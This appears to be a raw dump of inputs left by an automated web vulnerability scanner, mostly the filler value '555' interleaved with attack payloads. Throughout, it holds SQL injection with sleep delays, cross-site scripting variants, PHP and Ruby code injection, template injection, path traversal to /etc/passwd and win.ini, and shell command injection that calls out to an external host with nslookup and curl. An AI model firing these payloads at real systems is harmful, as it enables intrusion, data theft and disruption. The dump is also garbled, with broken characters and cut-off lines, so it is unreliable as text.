Mr.
555
555
555
555
555
555
555
555
555
555
555
C:\WINDOWS\system32\drivers\etc\hosts
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
file:///etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.print(md5(31337)).'
555
${@print(md5(31337))}\
555
555
${@print(md5(31337))}
555
555
555
";print(md5(31337));$a="
555
555
';print(md5(31337));$a='
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(116).concat(79).concat(106).concat(73)+(require'socket'
Socket.gethostbyname('hitkf'+'lwqirfgne5738.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(116).concat(65).concat(107).concat(68)+(require"socket"
Socket.gethostbyname("hitwl"+"tyxvuxnpafde3.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
555
".gethostbyname(lc("hityk"."qtjzutpjba63a.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(87).chr(112).chr(83)."
555
'.gethostbyname(lc('hittb'.'opracrvf91d45.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(80).chr(116).chr(86).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
./555
555
555
555
555
555
555
555
../555
555
'+'A'.concat(70-3).concat(22*4).concat(114).concat(70).concat(112).concat(67)+(require'socket'
Socket.gethostbyname('hitcy'+'jokvtsjrb5a1b.bxss.me.')[3].to_s)+'
'+'A'.concat(70-3).concat(22*4).concat(114).concat(70).concat(112).concat(67)+(require'socket'
Socket.gethostbyname('hitcy'+'jokvtsjrb5a1b.bxss.me.')[3].to_s)+'
555
555
"+"A".concat(70-3).concat(22*4).concat(117).concat(81).concat(109).concat(78)+(require"socket"
Socket.gethostbyname("hitxk"+"uclxtoea4190c.bxss.me.")[3].to_s)+"
'.print(md5(31337)).'
555
555
555
555
555
${@print(md5(31337))}\
${@print(md5(31337))}\
555
555
${@print(md5(31337))}
file:///etc/passwd
555
";print(md5(31337));$a="
";print(md5(31337));$a="
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../windows/win.ini
';print(md5(31337));$a='
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitsh"."ntjmpmiw6b447.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(72).chr(103).chr(71)."
555
555
'.gethostbyname(lc('hittr'.'pfkyntkiaf11a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(79).chr(111).chr(77).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@6aywE
����%2527%2522\'\"
'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1h9BXQ1oE')) OR 596=(SELECT 596 FROM PG_SLEEP(15))--
1Yswnrxfs') OR 259=(SELECT 259 FROM PG_SLEEP(15))--
1lrpMDsjJ' OR 178=(SELECT 178 FROM PG_SLEEP(15))--
1-1)) OR 851=(SELECT 851 FROM PG_SLEEP(15))--
1-1) OR 258=(SELECT 258 FROM PG_SLEEP(15))--
1-1 OR 866=(SELECT 866 FROM PG_SLEEP(15))--
1Pjukfy0i')); waitfor delay '0:0:15' --
1iPJ2Kybt'); waitfor delay '0:0:15' --
1KteTRwn0'; waitfor delay '0:0:15' --
1<aFYfjur<
1<img sRc='http://attacker-9198/log.php?
1<anckKgP x=9926>
1-1 waitfor delay '0:0:15' --
1<ifRAme sRc=9863.com></IfRamE>
1<WOPH3S>EV8MQ[!+!]</WOPH3S>
1qBgJy
<InvalidTag >VpJF(9017)</ScRiPt>
1-1)); waitfor delay '0:0:15' --
1}body{zzz:Expre/**/SSion(VpJF(9833))}
<a HrEF=jaVaScRiPT:>
1-1); waitfor delay '0:0:0' --
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=VpJF(9242)>
�<img zzz onmouseover=VpJF(99961) //�>
1<ScRiPt>VpJF(9490)</sCripT>
1\u003CScRiPt\VpJF(9926)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%56%70%4A%46%289547%29%3C%2F%73%43%72%69%70%54%3E
1-1); waitfor delay '0:0:6.656' --
1<img/src=">" onerror=alert(9173)>
1<img src=xyz OnErRor=VpJF(9003)>
1<img src=//xss.bxss.me/t/dot.gif onload=VpJF(9478)>
1<body onload=VpJF(9431)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9530'>
1-1); waitfor delay '0:0:15' --
1<isindex type=image src=1 onerror=VpJF(9435)>
1<svg
� onload=VpJF(9365);>
1<InvalidTag
>VpJF(9137)</ScRiPt>
1-1; waitfor delay '0:0:15' --
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9666></ScRiPt>
1<InvalidTag
>VpJF(9607)</ScRiPt>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%56%70%4A%46%28%39%34%32%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>VpJF(9572)</script>9572
1<InvalidTag>VpJF(9361)</script>
1<WOMVGD>EO5UB[!+!]</WOMVGD>
1<InvalidTag >VpJF(9893)</ScRiPt>
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
1*if(now()=sysdate(),sleep(15),0)
1
<%={{={@{#{${dfb}}%>
bfgx10297%C0%BEz1%C0%BCz2a%90bcxhjl10297
bfg3373%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3373
-1" OR 3*2>(0+5+399-399) --
19257814
-1" OR 3*2<(0+5+399-399) --
-1" OR 3+399-399-1=0+0+0+1 --
'"()&%<zzz><InvalidTag >VpJF(9725)</ScRiPt>
-1" OR 2+399-399-1=0+0+0+1 --
1'"()&%<zzz><InvalidTag >VpJF(9652)</ScRiPt>
-1' OR 3*2>(0+5+31-31) or 'R0YZDsRm'='
-1' OR 3*2<(0+5+31-31) or 'R0YZDsRm'='
-1' OR 3+31-31-1=0+0+0+1 or 'R0YZDsRm'='
-1' OR 2+31-31-1=0+0+0+1 or 'R0YZDsRm'='
-1' OR 3*2>(0+5+416-416) --
-1' OR 3*2<(0+5+416-416) --
-1' OR 3+416-416-1=0+0+0+1 --
-1' OR 2+416-416-1=0+0+0+1 --
-1 OR 3*2>(0+5+196-196)
-1 OR 3*2<(0+5+196-196)
-1 OR 3+196-196-1=0+0+0+1
-1 OR 2+196-196-1=0+0+0+1
-1 OR 3*2>(0+5+115-115) --
-1 OR 3*2<(0+5+115-115) --
-1 OR 3+115-115-1=0+0+0+1 --
-1 OR 2+115-115-1=0+0+0+1 --
1
1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bxss.me
c:/windows/win.ini
555
/etc/shells
http://bxss.me/t/fit.txt%3F.jpg
'+'A'.concat(70-3).concat(22*4).concat(97).concat(84).concat(119).concat(71)+(require'socket'
Socket.gethostbyname('hitmh'+'htlezsnz29e10.bxss.me.')[3].to_s)+'
Http://bxss.me/t/fit.txt
"+"A".concat(70-3).concat(22*4).concat(110).concat(70).concat(109).concat(76)+(require"socket"
Socket.gethostbyname("hitct"+"ivkmzqewc2be9.bxss.me.")[3].to_s)+"
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo vmumqp$()\ szazay\nz^xyu||a #' &echo vmumqp$()\ szazay\nz^xyu||a #|" &echo vmumqp$()\ szazay\nz^xyu||a #
555
555
../../../../../../../../../../../../../../etc/passwd
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
'.gethostbyname(lc('hityg'.'yqbkbopgcd073.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(67).chr(97).chr(78).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1<InvalidTag >n185(9769)</ScRiPt>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
1
<%={{={@{#{${dfb}}%>
bfgx10124%C0%BEz1%C0%BCz2a%90bcxhjl10124
bfg6571%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6571
19879699
'"()&%<zzz><InvalidTag >n185(9297)</ScRiPt>
1'"()&%<zzz><InvalidTag >n185(9386)</ScRiPt>
555
555
19634704
'"()&%<zzz><InvalidTag >mTlX(9696)</ScRiPt>
1'"()&%<zzz><InvalidTag >mTlX(9708)</ScRiPt>
1<afZvHej<
1<img sRc='http://attacker-9583/log.php?
1<aQXJ5L6 x=9425>
1<ifRAme sRc=9119.com></IfRamE>
1<WWFIWR>QNTZO[!+!]</WWFIWR>
1xhrtk
<InvalidTag >8UZ6(9829)</ScRiPt>
1}body{zzz:Expre/**/SSion(8UZ6(9713))}
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=8UZ6(9250)>
�<img zzz onmouseover=8UZ6(94681) //�>
1<ScRiPt>8UZ6(9273)</sCripT>
1\u003CScRiPt\8UZ6(9515)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%38%55%5A%36%289939%29%3C%2F%73%43%72%69%70%54%3E
1<img/src=">" onerror=alert(9864)>
1<img src=xyz OnErRor=8UZ6(9091)>
1<img src=//xss.bxss.me/t/dot.gif onload=8UZ6(9260)>
1<body onload=8UZ6(9378)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9414'>
1<isindex type=image src=1 onerror=8UZ6(9551)>
1<svg
� onload=8UZ6(9686);>
1<InvalidTag
>8UZ6(9204)</ScRiPt>
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9746></ScRiPt>
1<InvalidTag
>8UZ6(9390)</ScRiPt>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%38%55%5A%36%28%39%37%36%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>8UZ6(9304)</script>9304
1<InvalidTag>8UZ6(9282)</script>
1<WSON96>QHP5Y[!+!]</WSON96>
1<InvalidTag >8UZ6(9957)</ScRiPt>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
1
<%={{={@{#{${dfb}}%>
bfgx8216%C0%BEz1%C0%BCz2a%90bcxhjl8216
bfg1392%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl1392
19074711
'"()&%<zzz><InvalidTag >8UZ6(9577)</ScRiPt>
1'"()&%<zzz><InvalidTag >8UZ6(9814)</ScRiPt>
;(nslookup -q=cname hitttdhdnnzqj86a68.bxss.me||curl hitttdhdnnzqj86a68.bxss.me)|(nslookup -q=cname hitttdhdnnzqj86a68.bxss.me||curl hitttdhdnnzqj86a68.bxss.me)&(nslookup -q=cname hitttdhdnnzqj86a68.bxss.me||curl hitttdhdnnzqj86a68.bxss.me)
`(nslookup -q=cname hitpxvxzhdzgt36946.bxss.me||curl hitpxvxzhdzgt36946.bxss.me)`
|(nslookup -q=cname hithdfiyheeqv31c8c.bxss.me||curl hithdfiyheeqv31c8c.bxss.me)
WEB-INF\web.xml
WEB-INF/web.xml
&(nslookup -q=cname hitdhhgvbehpo4f990.bxss.me||curl hitdhhgvbehpo4f990.bxss.me)&'\"`0&(nslookup -q=cname hitdhhgvbehpo4f990.bxss.me||curl hitdhhgvbehpo4f990.bxss.me)&`'
&nslookup -q=cname hitrgncduummee093c.bxss.me&'\"`0&nslookup -q=cname hitrgncduummee093c.bxss.me&`'
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
$(nslookup -q=cname hitialooxbnwi7e422.bxss.me||curl hitialooxbnwi7e422.bxss.me)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
(nslookup -q=cname hitcacsxbtgsj445c4.bxss.me||curl hitcacsxbtgsj445c4.bxss.me))
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
|echo cmiuvm$()\ yhoxub\nz^xyu||a #' |echo cmiuvm$()\ yhoxub\nz^xyu||a #|" |echo cmiuvm$()\ yhoxub\nz^xyu||a #
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
&echo bcoiai$()\ xnrhkt\nz^xyu||a #' &echo bcoiai$()\ xnrhkt\nz^xyu||a #|" &echo bcoiai$()\ xnrhkt\nz^xyu||a #
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
echo jcizqs$()\ ckjkrc\nz^xyu||a #' &echo jcizqs$()\ ckjkrc\nz^xyu||a #|" &echo jcizqs$()\ ckjkrc\nz^xyu||a #
..\..\..\..\..\..\..\..\windows\win.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
/../../../../../../../../../../boot.ini
555
../../../../../../../../../../windows/win.ini%00.jpg
555
C:\WINDOWS\system32\drivers\etc\hosts
555
555
file:///etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
555
555
bxss.me
555
c:/windows/win.ini
555
555
/etc/shells
555
http://bxss.me/t/fit.txt%3F.jpg
555
Http://bxss.me/t/fit.txt
555
../555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
19498473
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
file:///etc/passwd
'"()&%<zzz><InvalidTag >k1zC(9093)</ScRiPt>
1'"()&%<zzz><InvalidTag >k1zC(9129)</ScRiPt>
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
'.print(md5(31337)).'
${@print(md5(31337))}\
555
555
555
555
${@print(md5(31337))}
xfs.bxss.me
";print(md5(31337));$a="
';print(md5(31337));$a='
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
"+response.write(9714873*9107947)+"
'+response.write(9714873*9107947)+'
555
555
response.write(9714873*9107947)
<!--
"||sleep(27*1000)*yozlog||"
555
555
'+'A'.concat(70-3).concat(22*4).concat(111).concat(83).concat(111).concat(89)+(require'socket'
Socket.gethostbyname('hitgs'+'lbcswzooc50ce.bxss.me.')[3].to_s)+'
'"
'||sleep(27*1000)*fnriqn||'
555
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(120).concat(87).concat(115).concat(69)+(require"socket"
Socket.gethostbyname("hitzy"+"swapldfqfe671.bxss.me.")[3].to_s)+"
"&&sleep(27*1000)*yewcrd&&"
555
HttP://bxss.me/t/xss.html?%00
555
'&&sleep(27*1000)*ifobwq&&'
555
'"()
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
555
555
555
555
555
555
${9999519+9999136}
555
555
555
^(#$!@#$)(()))******
".gethostbyname(lc("hitpr"."cpgouaymf4931.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(69).chr(98).chr(87)."
555
555
'.gethostbyname(lc('hitzp'.'plelkxzt44a2e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(83).chr(112).chr(66).'
!(()&&!|*|*|
)
555
555
555
a9hoUgAW
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
bxss.me
555
c:/windows/win.ini
555
555
555
555
555
555
/etc/shells
555
WEB-INF\web.xml
http://bxss.me/t/fit.txt%3F.jpg
555
WEB-INF/web.xml
555
&n963065=v948245
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\